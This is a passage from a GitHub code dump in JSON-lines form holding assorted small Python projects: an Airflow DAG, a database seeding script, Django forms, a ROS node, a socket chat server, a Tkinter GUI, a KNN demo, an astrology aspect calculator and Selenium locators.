exists_ok=True, # If True, ignore “already exists” errors when creating the table.\r\n    )\r\n\r\n    extract_bitcoin_price = PythonOperator(\r\n        task_id=\"extract_bitcoin_price\",\r\n        python_callable=extract_bitcoin_price\r\n    ) \r\n\r\n    generate_query = PythonOperator(\r\n        task_id=\"generate_query\",\r\n        python_callable=generate_query\r\n    ) \r\n\r\n    
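# Reads back the SQL file written by generate_query and submits it as a\r\n    # standard-SQL BigQuery job (useLegacySql is set to False in the configuration).\r\n    insert_value = 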
BigQueryInsertJobOperator(\r\n task_id=\"insert_value\",\r\n configuration={\r\n \"query\": {\r\n \"query\": open(FILE, 'r').read(),\r\n \"useLegacySql\": False,\r\n }\r\n },\r\n )\r\n\r\n create_empty_dataset >> create_empty_table >> extract_bitcoin_price >> generate_query >> insert_value\r\n\r\ngraph = taskflow()","repo_name":"Allle98/Airflow","sub_path":"GCS/ab_bq_bitcoin.py","file_name":"ab_bq_bitcoin.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42621606476","text":"from random import choice, randint\n\nfrom sqlalchemy.orm import Session\n\nimport app.crud as crud\nimport app.schemas as schemas\nfrom app.db import SessionLocal\n\nsession = SessionLocal()\n\nname = [\"Luan\", \"Dilermando\", \"Loreta\", \"Graca\", \"Lucas\", \"Gabriel\", \"Vinnie\", \"Carlos\",\n \"Giovani\", \"Laura\", \"Gilda\", \"Bianca\", \"Roberto\", \"Gustavo\", \"Ana\", \"Gabriel\"]\n\nlast_name = [\"Queiroz\", \"Silva\", \"Pereira\", \"Rocha\", \"Santos\", \"Pedra\", \"Pinto\", \"Gonçalves\",\n \"Caetano\", \"Wenzel\", \"Torchia\", \"Monteiro\"]\n\nemail = [\"@gmail.com\", \"@yahoo.com\", \"@hotmail.com\", \"@npc.com\", \"@neko.com\", \"@live.com\"]\n\ndescription = \"Lorem Ipsum is simply dummy text of the printing\" +\\\n \"and typesetting industry. Lorem Ipsum has been the\" +\\\n \"industry's standard dummy text ever since the 1500s,\" +\\\n \"when an unknown printer took a galley of type and\" +\\\n \"scrambled it to make a type specimen book\"\n\ndistrict = [\"tatuape\", \"bela vista\", \"se\", \"moema\", \"paraiso\", \"liberdade\", \"cambuci\", \"mooca\"]\n\ndef cpf_generate():\n while True:\n cpf = [randint(0, 9) for _ in range(9)]\n if cpf != cpf[::-1]:\n break\n\n for i in range(9, 11):\n value = sum((cpf[num] * ((i + 1) - num) for num in range(0, i)))\n digit = ((value * 10) % 11) % 10\n cpf.append(digit)\n\n result = ''.join(map(str, cpf))\n return result\n\n\"\"\"Populate studio\n\"\"\"\ndef populate_studio(amount: int = 10, db: Session = session):\n for i in range(amount):\n studio = {\n \"name\": f\"studio{i}\",\n \"display_name\": f\"{choice(name)} studio\",\n \"country\": \"BRL\",\n \"state\": \"SP\",\n \"city\": \"SP\",\n \"district\": choice(district),\n \"address\": \"rua ficticia\",\n \"number\": randint(1, 1000),\n \"zip_code\": f\"{randint(100000, 999999)}\",\n \"complement\": f\"ap {randint(1, 100)}\",\n \"email\": f\"clientuser{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\",\n \"description\": description[:randint(1, len(description)-10)],\n \"email_owner\": f\"studio{i}{choice(email)}\"\n }\n\n studio = schemas.StudioCreate(**studio)\n crud.studio.create(db=db, obj_in=studio)\n\n\"\"\"Populate service providers\n\"\"\"\ndef populate_service(amount: int = 10, db: Session = session):\n for i in range(amount):\n service_provider = {\n \"name\": f\"provider{i}\",\n \"display_name\": f\"{choice(name)} {choice(last_name)}\",\n \"cpf\": cpf_generate(),\n \"birth_date\": f\"{randint(1960, 2004)}-{randint(1,12)}-{randint(1,27)}\",\n \"email\": f\"provider{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\",\n \"description\": description[:randint(1, len(description)-1)]\n }\n\n service_provider = schemas.ServiceProviderCreate(**service_provider)\n crud.provider.create(db=db, obj_in=service_provider)\n\n\"\"\"Populate Client providers\n\"\"\"\ndef populate_client(amount: int = 10, db: Session = session):\n for i in range(amount):\n 
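# One synthetic client per iteration: cpf_generate() above returns a checksum-valid\n        # CPF, and choice()/randint() randomize the remaining profile fields.\n        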
client = {\n \"name\": f\"client{i}\",\n \"display_name\": f\"{choice(name)} {choice(last_name)}\",\n \"birth_date\": f\"{randint(1960, 2004)}-{randint(1,12)}-{randint(1,27)}\",\n \"cpf\": cpf_generate(),\n \"country\": \"BRL\",\n \"state\": \"SP\",\n \"city\": \"SP\",\n \"district\": choice(district),\n \"address\": \"rua corinthians\",\n \"number\": randint(1, 1000),\n \"zip_code\": f\"{randint(100000, 999999)}\",\n \"complement\": f\"ap {randint(1, 100)}\",\n \"email\": f\"client{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\"\n }\n \n client = schemas.ClientCreate(**client)\n crud.client.create(db=db, obj_in=client)\n\n\"\"\"Populate sell\n\"\"\"\ndef populate_sell(amount: int = 10, db: Session = session):\n for i in range(amount):\n sell = {\n \"studio_name\": f\"studio{i}\",\n \"client_name\": f\"client{i}\",\n \"service_provider_name\": f\"provider{i}\",\n \"service_style_name\": None,\n \"tender_id\": None,\n \"price\": randint(0, 1000),\n \"studio_rate\": randint(0, 5),\n \"client_rate\": randint(0, 5),\n \"service_provider_rate\": randint(0, 5),\n \"client_suggestion_desc\": description[:randint(1, 140)],\n \"client_satisfied\": True,\n \"number_of_sessions\": randint(1, 4),\n \"client_contract_confirmed\": True,\n \"service_provider_contract_confirmed\": True,\n \"start_time\": \"2022-08-18T01:15:46.185Z\",\n \"last_update\": \"2022-08-18T01:15:46.185Z\",\n \"finish_time\": \"2022-08-18T01:15:46.185Z\"\n }\n \n sell = schemas.SellCreate(**sell)\n crud.sell.create(db=db, obj_in=sell)\n\ndef main():\n populate_studio(10)\n populate_service(10)\n populate_client(10)\n populate_sell(10)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DilermandoQueiroz/service_studio-backend","sub_path":"app/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11894228751","text":"from django.forms import ModelForm, fields,DateInput\nfrom django.forms.models import ModelChoiceField\nfrom .models import MyUser,Hotel, Room,Booking\n# from django.forms import CharField, Form, PasswordInput\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django import forms\n\nclass MyUserForm(UserCreationForm):\n \n class Meta:\n model=MyUser\n fields=['email','username','fullname','phone','address','image']\n \n\nclass HotelForm(ModelForm):\n class Meta:\n model=Hotel\n fields = \"__all__\"\n\nclass RoomForm(ModelForm):\n class Meta:\n model=Room\n exclude =['active_booking','total_booking','status','hotel'] \n \nclass HotelForm(ModelForm):\n class Meta:\n model=Hotel\n exclude=['status','owner'] \n\nclass EditUserForm(ModelForm):\n class Meta:\n model=MyUser\n fields=['email','username','fullname','phone','address','image']\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\nclass BookingForm(ModelForm):\n \n class Meta:\n model=Booking\n fields=['date_from','date_to','number_of_adult','number_of_child']\n widgets = {\n 'date_from': DateInput(),\n 'date_to': DateInput(),\n }\n","repo_name":"Mubarisk/Hotel-Management","sub_path":"customers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4373394786","text":"from django.db.models.signals import post_save, post_delete\n# from django.contrib.auth import get_user_model\nfrom django.dispatch import receiver\nfrom taggit.models import Tag\nfrom 
.models import PostTag, PostTagExtended\n\n# print('signals imported')\n# User = get_user_model()\n\n# A new tag is saved, create extended part\n@receiver(post_save, sender = Tag)\ndef create_extended_tag(sender, instance, created, **kwargs):\n\tif created:\n\t\t# print('profile is being created')\n\t\tPostTagExtended.objects.create(tag = instance)\n\n\n# new extended part is created save it.\n# @receiver(post_save, sender = Tag)\n# def save_extended_tag(sender, instance, created, **kwargs):\n# \t# print('profile is saved')\n# \tinstance.PostTagExtended.save()\n\n@receiver(post_save, sender = PostTag)\ndef tag_count_increment(sender, instance, created, **kwargs):\n\tinstance.tag.posttagextended.count += 1\n\tinstance.tag.posttagextended.save()\n\n@receiver(post_delete, sender = PostTag)\ndef tag_count_decrement(sender, instance, **kwargs):\n\tif instance.tag.posttagextended.count > 0:\n\t\tinstance.tag.posttagextended.count -= 1\n\t\tinstance.tag.posttagextended.save()\n","repo_name":"naeem-akhtar/paperhub","sub_path":"posts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33677238033","text":"#!/usr/bin/env python2\n\n\"\"\"Turns the neato a certain amount.\"\"\"\n\nfrom geometry_msgs.msg import Twist, Vector3\nfrom nav_msgs.msg import Odometry\nimport numpy as np\nimport tf\nimport math\n\nimport smach\nimport rospy\n\nclass Turn(smach.State):\n def __init__(self, goal_angle):\n super(Turn, self).__init__(outcomes=['Completed_Successfully', 'Aborted'])\n self.goal_angle = goal_angle\n self.orientation = None\n\n self.got_first_odom_msg = False\n\n rospy.Subscriber('/odom', Odometry, self.update_odometry)\n self.publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n\n rospy.on_shutdown(self.stop)\n\n\n def convert_to_euler(self, x, y, z, w):\n quaternion = (x, y, z, w)\n euler = tf.transformations.euler_from_quaternion(quaternion)\n roll = euler[0]\n pitch = euler[1]\n yaw = euler[2]\n return np.array([roll, pitch, yaw])\n\n def stop(self):\n self.publisher.publish(\n Twist(linear=Vector3(0.0, 0.0, 0.0), angular=Vector3(0.0, 0.0, 0.0))\n )\n\n def update_odometry(self, msg):\n current_quat = msg.pose.pose.orientation\n self.orientation = self.convert_to_euler(current_quat.x, current_quat.y, current_quat.z, current_quat.w)\n\n if not self.got_first_odom_msg:\n self.got_first_odom_msg = True\n \n def get_angle(self):\n return -self.orientation[2]\n\n def delta_angle(self, a, b):\n return ((b - a) + math.pi) % (math.pi * 2.0) - math.pi\n\n def rotate(self, angle):\n r = rospy.Rate(50)\n\n starting_angle = self.get_angle()\n final_angle = starting_angle + angle\n\n while not rospy.is_shutdown() and self.got_first_odom_msg:\n delta = self.delta_angle(self.get_angle(), final_angle)\n if abs(delta) >= math.pi / 500.0:\n turn_msg = Twist(angular=Vector3(0.0, 0.0, -delta * 0.9))\n self.publisher.publish(turn_msg)\n else:\n self.stop()\n return True\n r.sleep()\n if rospy.is_shutdown():\n return False\n\n def execute(self, userdata):\n return self.run()\n\n def run(self):\n r = rospy.Rate(50)\n\n # Wait for the first odometry position update to come in\n while not self.got_first_odom_msg:\n r.sleep()\n\n success = self.rotate(self.goal_angle)\n if success:\n return 'Completed_Successfully'\n else:\n return 'Aborted'\n\nif __name__ == '__main__':\n rospy.init_node('Turn')\n 
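# Manual smoke test: a goal of -math.pi/2 rad requests a quarter turn; run()\n    # blocks until the rotation finishes or rospy shuts down.\n    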
Turn(-math.pi/2).run()\n","repo_name":"Joboman555/Drawbot","sub_path":"src/drawbot/Turn.py","file_name":"Turn.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20516784341","text":"import socket\r\nimport _thread\r\nfrom _thread import start_new_thread\r\n\r\n# parameters\r\nhost_ip=''\r\nport_no=8082\r\nclient_list = []\r\n\r\ndef bind(host_ip,port_no):\r\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.bind((host_ip,port_no))\r\n\ts.listen(5)\r\n\treturn s\r\n\r\n\r\ndef client_broadcast(addr,strg):\r\n\tfor i in client_list:\r\n\t\ta=str(addr)+str(strg)\r\n\t\ti.sendall(str.encode(a))\r\n\r\ndef client_thread(c,addr):\r\n\t\tprint (\"got connection from\", addr)\r\n\t\ti=\"\"\r\n\t\twhile i != \"exit\":\r\n\t\t\ti=c.recv(1024).decode()\r\n\t\t\tprint (\"received\", addr, i)\r\n\t\t\tstart_new_thread(client_broadcast, (addr,i, ))\t\t\r\n\t\tprint (\"client connection closed\", addr)\r\n\t\tc.close()\r\n\t\tclient_list.pop(client_list.index(c))\r\n\r\ndef connect_clients(s):\r\n\twhile True:\r\n\t\tc,addr=s.accept()\r\n\t\tclient_list.append(c)\r\n\t\tstart_new_thread(client_thread, (c,addr,))\r\n\r\ndef main():\r\n\ts=bind(host_ip, port_no)\r\n\tconnect_clients(s)\r\n\tprint (\"connection closed with all the clients\\n\")\r\n\ts.close()\r\n\r\nif __name__== \"__main__\":\r\n\tmain()\r\n","repo_name":"koushikskr/NA1-PART1","sub_path":"napart2/krshny-Part2-d-server-krshny.py","file_name":"krshny-Part2-d-server-krshny.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9283774591","text":"import json\n\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom devmine.app.models.github.user import GithubUser\nfrom devmine.app.controllers.application_controller import (\n ApplicationController\n)\nfrom devmine.app.helpers import application_helper as ah\n\n\nclass GithubUsersController(ApplicationController):\n\n def index(self, db):\n \"\"\"Return the list of all users.\"\"\"\n since_id = super().get_since_id()\n try:\n users = db.query(GithubUser).filter(\n GithubUser.id >= since_id).limit(100).all()\n except NoResultFound:\n users = {}\n return json.dumps(users, cls=ah.AlchemyEncoder)\n\n def show(self, db, id):\n \"\"\"Return the user corresponding to the given id.\"\"\"\n super().assert_id(id)\n try:\n user = db.query(GithubUser).filter_by(id=id).one()\n except NoResultFound:\n user = {}\n return json.dumps(user, cls=ah.AlchemyEncoder)\n\n def login(self, db, login):\n \"\"\"Return the user corresponding to the given login.\"\"\"\n try:\n login = db.query(GithubUser).filter_by(login=login).all()\n except NoResultFound:\n login = {}\n return json.dumps(login, cls=ah.AlchemyEncoder)\n","repo_name":"DevMine/devmine-core","sub_path":"devmine/app/controllers/github/users_controller.py","file_name":"users_controller.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"6133709418","text":"# Import module\nfrom tkinter import *\nfrom tkinter import ttk \nimport Common_Requirements_File\nfrom PIL import ImageTk,Image\nfrom tkinter import messagebox\nfrom connection import *\nimport pymysql\n\nclass update_Student:\n def __init__(self,update_student_root):\n self.update_student_root = update_student_root\n self.update_student_root.title(\"Update Student\")\n self.regno_var = 
StringVar()\n\n # self.update_student_frame()\n self.regno()\n\n p_obj=Common_Requirements_File.Common_Requirements(self.update_student_root)\n p_obj.header()\n p_obj.left_nav_bar_setting()\n p_obj.right_nav_bar_setting()\n\n # Search box\n def regno(self):\n self.frm = Frame(self.update_student_root,bg='white')\n self.frm.place(x=550,y=100,height=100,width=400)\n\n regno=Label(self.frm,text=\"Enter Registration Number : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=10,y=15)\n self.txt_frame=Entry(self.frm,font=(\"time new roman\",15),bg=\"lightgrey\",textvariable=self.regno_var).place(x=10,y=50,width=330)\n s_btn=Button(self.frm,bd=0,cursor=\"hand2\" ,text=\"🔍\",fg=\"green\",bg=\"white\",font=(15),activebackground=\"white\",activeforeground=\"white\",command=self.check_regno).place(x=350,y=50,width=30,height=25)\n\n # Checking search box value\n def check_regno(self):\n if self.regno_var.get()==\"\":\n messagebox.showerror(\"Error\",\"Please Enter The Fields To Proceed\")\n else:\n try:\n cur=connection()\n cur.execute(\"Select * from student_details where registration_number=%s\",(self.regno_var.get()))\n self.rows = cur.fetchall()\n if len(self.rows) == 0:\n self.not_found()\n messagebox.showerror(\"Error\",\"Sorry, We cannot find a student with this registration\")\n else:\n self.found_data(self.rows)\n self.update_studet_frame(self.rows)\n \n except Exception as es :\n messagebox.showerror(\"Error\",f\"Error due to: {str(es)}\")\n\n # Display searched details in frame\n def found_data(self,rows):\n self.found_frm = Frame(self.update_student_root,bg='white')\n self.found_frm.place(x=300,y=250,height=400,width=435)\n\n Label(self.found_frm,text=f\"Student Details of {rows[0][0]}\",font=(\"Candara Light\",25,\"bold\",\"underline\"),fg=\"black\",bg='white').pack(side=TOP)\n \n Label(self.found_frm,text=\"Reg No. 
: \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=95)\n Label(self.found_frm,text=f\"{rows[0][0]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=95)\n\n Label(self.found_frm,text=\"Name : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=135)\n Label(self.found_frm,text=f\"{rows[0][1]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=135)\n\n Label(self.found_frm,text=\"Department : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=175)\n Label(self.found_frm,text=f\"{rows[0][2]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=175)\n\n Label(self.found_frm,text=\"Year : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=215)\n Label(self.found_frm,text=f\"{rows[0][3]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=215)\n\n Label(self.found_frm,text=\"Date of Birth : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=255)\n Label(self.found_frm,text=f\"{rows[0][4]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=255)\n\n Label(self.found_frm,text=\"Number : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=295)\n Label(self.found_frm,text=f\"{rows[0][5]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=295)\n \n Label(self.found_frm,text=\"Email : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=335)\n Label(self.found_frm,text=f\"{rows[0][6]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=335)\n\n def update_studet_frame(self,rows):\n frm_update = Frame(self.update_student_root,bg='white')\n frm_update.place(x=775,y=250,height=400,width=425)\n\n title1=Label(frm_update,text=\"Update student\",font=(\"Candara Light\",25,\"bold\",\"underline\"),fg=\"black\",bg=\"white\").pack(side=TOP)\n \n data_update_values=['Select','Name','department','year','dob','contact','email']\n\n lal_select_detatils=Label(frm_update,text=\"Select Details To Change\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=80)\n self.select_detatils = ttk.Combobox(frm_update, value=data_update_values,font=\"calibri 12\",state='readonly') \n self.select_detatils .place(x=25,y=120,width=375,height=25)\n self.select_detatils .current(0)\n\n self.mystr = StringVar()\n\n lal_old_data=Label(frm_update,text=\"Previous Data\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=165)\n self.old_data = Entry(frm_update,font=(\"calibri\",12, \"bold\"),fg=\"black\",borderwidth=2,textvariable=self.mystr, state=DISABLED) \n self.old_data.place(x=25,y=200,width=375,height=25)\n self.select_detatils.bind(\"<>\", self.previous_details)\n\n\n lal_new_data=Label(frm_update,text=\"New Data\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=240)\n self.new_data = Entry(frm_update,font=(\"calibri\",12),borderwidth=2) \n self.new_data.place(x=25,y=280,width=375,height=25)\n \n s_btn=Button(frm_update,bd=0,cursor=\"hand2\",text=\"Update\",fg=\"white\",bg=\"dimgray\",font=(\"times new roman\",20,\"bold\"),activebackground=\"gray\",activeforeground=\"white\",command=self.update_details).place(x=25,y=330,width=375,height=40)\n\n def previous_details(self,event):\n if self.select_detatils.get() != \"Select\":\n cur=connection()\n cur.execute(\"select \"+self.select_detatils.get()+\" from student_details where registration_number= %s \",(self.rows[0][0]))\n 
row=cur.fetchone()\n            previous_data=row[0]\n            self.mystr.set(previous_data)\n        else: \n            self.mystr.set(\"\")\n\n    def update_details(self):\n        if self.select_detatils.get()==\"Select\" or self.new_data.get()==\"\":\n            messagebox.showerror(\"Error\",\"All fields are required\")\n        elif self.old_data.get() == self.new_data.get():\n            messagebox.showerror(\"Error\",\"You are trying to update the same details\")\n        else:\n            msg = messagebox.askquestion(\"Question\",\"Do you surely need to update\")\n            if msg == 'yes':\n                con= givi_me_connection()\n                cur = con.cursor()\n                cur.execute(\"update student_details set \"+self.select_detatils.get()+\" =%s where registration_number= %s\",(self.new_data.get(),self.regno_var.get()))\n                con.commit()\n                messagebox.showinfo(\"Updated\",\"Details Updated\")\n                cur.execute(\"Select * from student_details where registration_number=%s\",(self.regno_var.get()))\n                rows = cur.fetchall()\n                self.found_data(rows)\n                self.update_studet_frame(self.rows)\n\n    def not_found(self):\n        self.not_frm = Frame(self.update_student_root,bg='#f0f0f0')\n        self.not_frm.place(x=300,y=250,height=400,width=1200)\n\ndef update_student_main():\n    update_student_root=Tk()\n    obj = update_Student(update_student_root)\n    update_student_root.mainloop() ","repo_name":"magarwal1324/Debug-Entity","sub_path":"Smart Attendance All Done/update_student.py","file_name":"update_student.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30462340958","text":"import numpy as np\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport warnings\nfrom matplotlib import style\nfrom collections import Counter #will act as counter for k\nstyle.use('fivethirtyeight')\n\ndataset={'k':[[1,2],[2,3],[3,1]],'r':[[6,5],[7,7],[8,6]]} #dictionary containing two classes k,r\nnew_features=[5,7]\n\n'''\n[[plt.scatter(ii[0],ii[1],s=100,color=i) for ii in dataset[i]] for i in dataset] #plotting each element of each class\nplt.scatter(new_features[0],new_features[1])\nplt.show()\n'''\n\ndef k_nearest_neighbors(data,predict,k=3):\n    if(len(data)>=k):\n        warnings.warn('K is set to a value less than total voting groups')\n    distances=[]\n    for group in data:\n        for features in data[group]:\n            euclidean_distance=np.linalg.norm(np.array(features)-np.array(predict))#it is actually the built in function from numpy which allows us to calculate euclidean_distance for n dimension features(#cheating)\n            distances.append([euclidean_distance,group]) #distances is a list of lists [[a,b]..] 
a is distance from each element of group k and r, b is 1 or 2\n print(distances) #-> [[6.4031242374328485, 'k'], [5.0, 'k'], [6.324555320336759, 'k'], [2.23606797749979, 'r'], [2.0, 'r'], [3.1622776601683795, 'r']]\n votes=[i[1] for i in sorted(distances)[:k]] # distances sorted by their forst value i.e the distances and we only need first k values from starting\n print(votes) # -> ['r', 'r', 'r']\n print(Counter(votes).most_common(1)) #->[('r', 3)], now most_common(1) means select only one which is the most common ie r (which is 3 times) here\n #in case we hade most_common(2) then our output will be have two list elements(like take new_features=5,4 and result would be [('k', 2), ('r', 1)]\n vote_result=Counter(votes).most_common(1)[0][0] #now two zeroes meaning is clear\n return vote_result\n\n\nresult=k_nearest_neighbors(dataset,new_features,k=3)\nprint(result)\n\n\n[[plt.scatter(ii[0],ii[1],s=100,color=i) for ii in dataset[i]] for i in dataset] #plotting each element of each class\nplt.scatter(new_features[0],new_features[1], color=result)\nplt.show()\n","repo_name":"vsrandom/Machine_Learning","sub_path":"Knearestneigh/my_k_near_neigh (copy).py","file_name":"my_k_near_neigh (copy).py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9918108870","text":"\"\"\"A program to count the number of pairs of repeated characters in a string.\r\nSimlindile Mahlaba\r\n09 May 2014\"\"\"\r\n\r\ndef rep_letters(str_1, list_1, count):\r\n if len(str_1)>0:\r\n if len(list_1)==0:\r\n list_1.append(str_1[0])\r\n elif str_1[0]!=list_1[len(list_1)-1]:\r\n list_1.append(str_1[0])\r\n else:\r\n if str_1[0]==list_1[len(list_1)-1]:\r\n list_1.remove(str_1[0])\r\n count+=1\r\n str_1=str_1[1:len(str_1)]\r\n return rep_letters(str_1, list_1, count)\r\n if len(str_1)==0:\r\n return count\r\n\r\ndef main():\r\n str_1=input(\"Enter a message:\\n\")\r\n list_1=[]\r\n count=0\r\n print(\"Number of pairs:\",rep_letters(str_1, list_1, count))\r\nmain()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/mhlsim020/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74716742199","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 16 22:38:11 2019\n\n@author: viren\n\"\"\"\n\nfrom pandas_datareader import data\nimport datetime\nfrom bokeh.plotting import figure, show, output_file\n\nstart=datetime.datetime(2016,3,2);\nend=datetime.datetime(2016,5,10);\ndf=data.DataReader(name=\"GOOG\",data_source=\"yahoo\",start=start,end=end);\n\ndef inc_dec(c,o):\n if c>o:\n value=\"Increase\";\n elif c 180:\r\n\t\t\taspect = 360 - aspect\r\n\r\n\t# return aspect\r\n\treturn round(aspect,2)\r\n\r\ndef parse_ephemeris (data):\r\n\t\"\"\"\r\n\tdata is taken from the ephermeris here: http://ephemeris.com/ephemeris.php\r\n\tparse each line of the data and load it into the 'input' dataframe\r\n\r\n\tARGS:\r\n\t- input = a panda DataFrame of ephemeris data for a given day\r\n\t- datafil - raw planetary data includes sign, degrees, minutes (see below)\r\n\r\n\tRETURN:\r\n\t- DataFrame representing the 'matrix' of all planetary aspects possible\r\n\t for the given input.\r\n\t\r\n\tFor example, if the input contains the planetary data for Mars, Jupiter, Saturn,\r\n\tthe returned data will be a 3x3 matrix of the planetary aspects:\r\n\t\t- Mars-Mars (set to 
None)\r\n\t\t- Mars-Jupiter (aspect angle between the two planetary bodies)\r\n\t\t- Mars-Saturn (aspect angle between the two planetary bodies)\r\n\t\"\"\"\r\n\tdatafile = open(data, 'r')\r\n\tLines = datafile.readlines()\r\n\r\n\t# parse and store [the first 24 char of] each line into planetary positions\r\n\tinput = pd.DataFrame()\r\n\tfor line in Lines:\r\n\t\tif len(line[:24].split()) == 4:\r\n\t\t\tbody, degrees, sign, minutes = line[:24].split()\r\n\r\n\t\t\t# Pandas expects that each value of a dictionary to be a list\r\n\t\t\tdata = dict(body=body, sign=sign, degrees=degrees, minutes=minutes)\r\n\t\t\tnew_row = pd.DataFrame([data])\r\n\r\n\t\t# handle Moon's Node - len = 5\r\n\t\telse:\r\n\t\t\tbody, _, degrees, sign, minutes = line[:24].split()\r\n\r\n\t\t\t# convert each row from List to Dict, then a DataFrame\r\n\t\t\tdata = dict(body=\"MoonsNode\", sign=sign, degrees=degrees, minutes=minutes)\r\n\r\n\t\t\t# error - need to force an index\r\n\t\t\t# see https://stackoverflow.com/questions/57631895/dictionary-to-dataframe-error-if-using-all-scalar-values-you-must-pass-an-ind\r\n\t\t\tnew_row = pd.DataFrame([data])\r\n\r\n\t\t# collect all rows\r\n\t\tinput = pd.concat([input, new_row], ignore_index=True)\r\n\r\n\t# get list of 'keys' or planetary bodies from the input\r\n\tinput.set_index('body', inplace=True)\r\n\tmatrix = pd.DataFrame()\r\n\r\n\t# for each body fetch the aspect between it and the remaining bodies (targets)\r\n\tbodies = list(input.index.values)\r\n\tfor body in bodies:\r\n\t\ttargets = copy.deepcopy(bodies)\r\n\t\t# targets.remove(body)\r\n\t\trow = {'body': body}\r\n\r\n\t\tsource_pos = list(input.loc[body][[\"sign\", \"degrees\", \"minutes\"]])\r\n\t\tfor target in targets:\r\n\t\t\ttarget_pos = list(input.loc[target][[\"sign\", \"degrees\", \"minutes\"]])\r\n\r\n\t\t\t# give unique name to each aspect\r\n\t\t\t# label = body.lower() + '_' + target.lower()\r\n\t\t\taspect = calc_aspect(source_pos, target_pos)\r\n\r\n\t\t\tif body != target:\r\n\t\t\t\trow[target] = aspect\r\n\t\t\telse:\r\n\t\t\t\trow[target] = \"NULL\"\r\n\r\n\t\t# Pandas expects that each value of a dictionary to be a list\r\n\t\t# Convert dictionary to a dictionary of lists\r\n\t\tdict_data = {k: [v] for k, v in row.items()}\r\n\r\n\t\tnew_row = pd.DataFrame(dict_data)\r\n\r\n\t\t# collect all rows\r\n\t\tmatrix = pd.concat([matrix, new_row], ignore_index=True)\r\n\r\n\tmatrix.set_index('body', inplace=True)\r\n\treturn matrix\r\n\r\n# main\r\n\r\n# TODO - pass datafile as ARGV\r\nmatrix = parse_ephemeris(\"ephemeris-20230627.dat\")\r\nprint(matrix)\r\n","repo_name":"rmeus/planetary-aspects","sub_path":"aspect-matrix.py","file_name":"aspect-matrix.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42182749122","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver import Keys\nimport pytest\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nfooter_website_locator = (By.CLASS_NAME, \"inner-footer-container\")\ncompany_title_locator = (By.XPATH, \"//p[@class='section-heading' and text()='Company']\")\ncompany_content_locator = (By.CSS_SELECTOR, \".footer-section > div > p\")\ngitHub_icon_image = (By.XPATH, \"//div[@class='social']//a[6]/img\")\nlogo = (By.CSS_SELECTOR, \"#first-level-nav a\")\ncopyright_locator = (By.CSS_SELECTOR, \"div.inner-footer-container div.horizontal-section.my-5 span:nth-child(3)\")\ncopyright_expected_result = ['©', 
